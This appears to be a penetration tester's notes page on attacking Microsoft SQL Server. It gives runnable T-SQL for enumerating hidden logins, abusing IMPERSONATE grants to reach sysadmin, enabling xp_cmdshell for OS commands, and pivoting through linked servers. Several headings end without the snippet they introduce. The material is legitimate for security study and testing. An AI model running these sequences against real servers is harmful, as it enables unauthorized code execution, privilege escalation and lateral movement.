MS SQL (Microsoft SQL Server) is Microsoft's relational database server.
- Default port: TCP 1433 (named instances listen on a dynamic port that clients resolve through the SQL Browser service on UDP 1434)
- public role
- PowerUpSQL notes
- SQLRecon notes
Every login is a member of public, but a login without sysadmin (or VIEW ANY DEFINITION) sees only a handful of entries in sys.server_principals, so it cannot directly list who else has a login on the instance. To enumerate logins anyway, fuzz principal IDs with SUSER_NAME(), which PowerUpSQL's Get-SQLFuzzServerLogin automates:
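The same fuzzing done by hand in T-SQL, as an added example that is not part of the original notes. It works from a low-privileged login because SUSER_NAME() resolves an ID to a name without checking catalog visibility; the upper bound of 3000 is an assumption and should be raised on instances with many logins.

```sql
-- Added example: enumerate logins by fuzzing server principal IDs.
-- SUSER_NAME(id) returns NULL for unused IDs, so only real logins are kept.
DECLARE @logins TABLE (principal_id INT, login_name SYSNAME);
DECLARE @id INT = 1;

WHILE @id <= 3000          -- assumed upper bound; raise if the instance is large
BEGIN
    IF SUSER_NAME(@id) IS NOT NULL
        INSERT INTO @logins (principal_id, login_name)
        VALUES (@id, SUSER_NAME(@id));
    SET @id += 1;
END;

-- Result set with every login found (sa is always principal_id 1).
SELECT principal_id, login_name FROM @logins ORDER BY principal_id;

-- For comparison: what the catalog shows this login directly.
-- A non-sysadmin typically sees only sa, itself, the fixed roles and a few
-- NT SERVICE / ##MS_*## accounts here.
SELECT principal_id, name, type_desc, is_disabled
FROM sys.server_principals
ORDER BY principal_id;
```

Names that appear in the fuzzed list but not in the catalog query are the ones the instance is hiding from this login; they are the candidates for impersonation and password spraying later on.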
Apart from PowerUpSQL and SQLRecon, mssqlclient.py (impacket) can also be used to run SQL statements interactively, with either a SQL login or Windows (domain) authentication:
RCE via impersonation
#ttp/09-lateral-movement #ttp/03-execution
See: PowerUpSQL, SQLRecon
Look for logins that hold the IMPERSONATE permission on another login (alternatively use SQLRecon). If the impersonable login is sysadmin, EXECUTE AS LOGIN switches the session to it and everything in the xp_cmdshell section below becomes available.
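Finding and abusing an impersonation grant in T-SQL, as an added example that is not from the original notes. The target login name sa in the second half is an assumption; substitute whatever the first query returns.

```sql
-- Added example: who can impersonate whom on this instance.
-- For IMPERSONATE on a login, sys.server_permissions stores the impersonated
-- login's principal_id in major_id (class 101 = SERVER_PRINCIPAL) and the
-- login allowed to impersonate it in grantee_principal_id.
SELECT grantee.name AS can_impersonate,
       target.name  AS target_login,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON p.major_id = target.principal_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE'
  AND p.state_desc = 'GRANT';

-- Before: who we are and whether we are already sysadmin.
SELECT SYSTEM_USER AS login_before, IS_SRVROLEMEMBER('sysadmin') AS sysadmin_before;

-- Switch the security context. 'sa' is assumed here; use a login from the
-- query above. EXECUTE AS can be nested to hop through a chain of grants.
EXECUTE AS LOGIN = 'sa';

-- After: the session now carries sa's rights for everything that follows,
-- including sp_configure / xp_cmdshell (see the next section).
SELECT SYSTEM_USER AS login_after, IS_SRVROLEMEMBER('sysadmin') AS sysadmin_after;

-- Drop back to the original login once done.
REVERT;
```

A low-privileged login can see its own grants in sys.server_permissions, so the first query is usable without sysadmin. Note that EXECUTE AS USER (database-level impersonation) is a different, weaker primitive: it only escalates to sysadmin when the database is marked TRUSTWORTHY and owned by a sysadmin login.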
RCE via xp_cmdshell
#ttp/02-initial-access #ttp/03-execution
xp_cmdshell is an extended stored procedure, disabled by default, that lets SQL users run OS commands. Enabling it (sp_configure) requires sysadmin, and for sysadmin callers the command runs under the SQL Server service account. A non-sysadmin login can only call it if it has been granted EXECUTE on xp_cmdshell and the ##xp_cmdshell_proxy_account## credential is configured; the command then runs as that proxy account, and without it the call fails.
PowerUpSQL's Invoke-SQLOSCmd (sysadmin required; it enables xp_cmdshell, runs the command, then restores the previous setting):
Enable and use xp_cmdshell manually:
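The manual sequence in T-SQL, as an added example that is not from the original notes. It checks the current state first, captures command output into a table so it is readable from tools that only show result sets, checks for the proxy credential, and puts the setting back afterwards. The DOMAIN\svc proxy account in the comment is an assumption.

```sql
-- Added example: enable xp_cmdshell, run a command, clean up. Needs sysadmin.

-- 1. Current state (value_in_use = 1 means already on).
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Enable. 'show advanced options' must be on before xp_cmdshell is visible
--    to sp_configure; RECONFIGURE applies each change.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. Run a command. Output is returned as one row per line, with a NULL row
--    at the end; capture it in a table variable to keep it in a result set.
DECLARE @out TABLE (line NVARCHAR(4000));
INSERT INTO @out EXEC master..xp_cmdshell 'whoami /priv';
SELECT line FROM @out WHERE line IS NOT NULL;

-- 4. Proxy account check: this credential is what non-sysadmin callers run as.
--    An empty result means only sysadmin members can use xp_cmdshell.
SELECT name, credential_identity
FROM sys.credentials
WHERE name = '##xp_cmdshell_proxy_account##';
-- To create one (sysadmin), e.g. with an assumed account DOMAIN\svc:
-- EXEC sp_xp_cmdshell_proxy_account 'DOMAIN\svc', 'password';

-- 5. Restore the original state so the change does not stay behind.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

The whoami /priv output in step 3 is worth reading before moving on: it shows the service account's token privileges, which is exactly what the next section relies on.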
Privesc via SeImpersonatePrivilege
See: JuicyPotato and SweetPotato
#ttp/05-privilege-escalation
The SQL Server service account (a virtual account such as NT Service\MSSQLSERVER, or a domain service account) normally holds SeImpersonatePrivilege, and xp_cmdshell runs as that account. The Potato family abuses this: JuicyPotato and its variants coerce a SYSTEM process into authenticating to an attacker-controlled local endpoint (DCOM/RPC for JuicyPotato, the print spooler named pipe for PrintSpoofer/SweetPotato), and SeImpersonatePrivilege then allows the resulting SYSTEM token to be impersonated and used to spawn a SYSTEM process.
Lateral Movement via Links
#ttp/09-lateral-movement #ttp/02-initial-access
"Links" (linked servers) allow an SQL Server to run queries against another instance, which does not need to be in the same domain. The link authenticates with whatever the link was configured with, frequently a fixed login such as sa, so a low-privileged user on one instance can end up as sysadmin on the next.
To list links:
To run a query through a link:
xp_cmdshell cannot (normally) be enabled over a link
Although xp_cmdshell can be used over a link if it is already enabled on the remote instance, it cannot be enabled through OPENQUERY, which only carries statements that return a result set. sp_configure and RECONFIGURE can only be sent over a link with EXEC ... AT, and that requires the link option rpc out to be enabled.
To enable xp_cmdshell when the link has rpc out = true:
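The whole link procedure in T-SQL (listing links, querying through one, checking rpc out, enabling and calling xp_cmdshell remotely), as an added example that is not from the original notes. The link name DC01 is an assumption.

```sql
-- Added example: walk a linked server. [DC01] is an assumed link name.

-- 1. List links together with the two options that matter:
--    is_data_access_enabled gates OPENQUERY, is_rpc_out_enabled gates EXEC ... AT.
SELECT name, product, provider, data_source,
       is_data_access_enabled, is_rpc_out_enabled
FROM sys.servers
WHERE is_linked = 1;
-- older equivalent: EXEC sp_linkedservers;

-- 2. Read-only query through the link (works without rpc out).
--    Single quotes inside the remote statement are doubled.
SELECT *
FROM OPENQUERY([DC01], 'SELECT @@servername AS srv, SYSTEM_USER AS login,
                        IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- 3. Find the next hop: links defined on the remote side.
SELECT *
FROM OPENQUERY([DC01], 'SELECT name, data_source FROM sys.servers WHERE is_linked = 1');

-- 4. xp_cmdshell through OPENQUERY only works if it is already on remotely.
--    Enabling it this way fails, because sp_configure returns no result set.
-- SELECT * FROM OPENQUERY([DC01], 'EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE');

-- 5. With is_rpc_out_enabled = 1, EXEC ... AT sends arbitrary batches instead.
EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [DC01];
EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC01];
EXEC ('xp_cmdshell ''whoami''') AT [DC01];

-- 6. If you are sysadmin on the local side but the link has rpc out off,
--    turn it on here and go back to step 5.
EXEC sp_serveroption 'DC01', 'rpc out', 'true';
```

Step 6 is the usual way around the restriction in the heading: rpc out is a property of the link on the calling side, so local sysadmin (obtained via impersonation or a proxy account, say) is enough to flip it, after which the remote instance can be reconfigured even though no credentials for it are known.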
Automatically enumerate links: